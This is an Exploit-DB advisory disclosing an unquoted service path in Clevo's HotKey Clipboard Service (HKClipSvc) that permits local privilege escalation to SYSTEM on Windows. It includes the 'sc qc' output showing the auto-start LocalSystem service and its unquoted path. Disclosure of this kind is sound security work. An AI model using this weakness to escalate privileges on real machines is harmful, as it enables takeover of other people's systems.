HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path

EDB-ID:

51206

CVE:

N/A




Platform:

Windows

Date:

2023-04-03


# Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path
# Date: 2023/01/17
# Exploit Author : Wim Jaap van Vliet
# Vendor Homepage: www.clevo.com.tw
# Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip
# Version:  2.1.0.6
# Tested on: Windows 11 Pro 10.0.22000

# Exploit
The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo has a unquoted service path.
This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.

# Information
 
C:\>sc qc "HKClipSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HKClipSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HotKey Clipboard Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem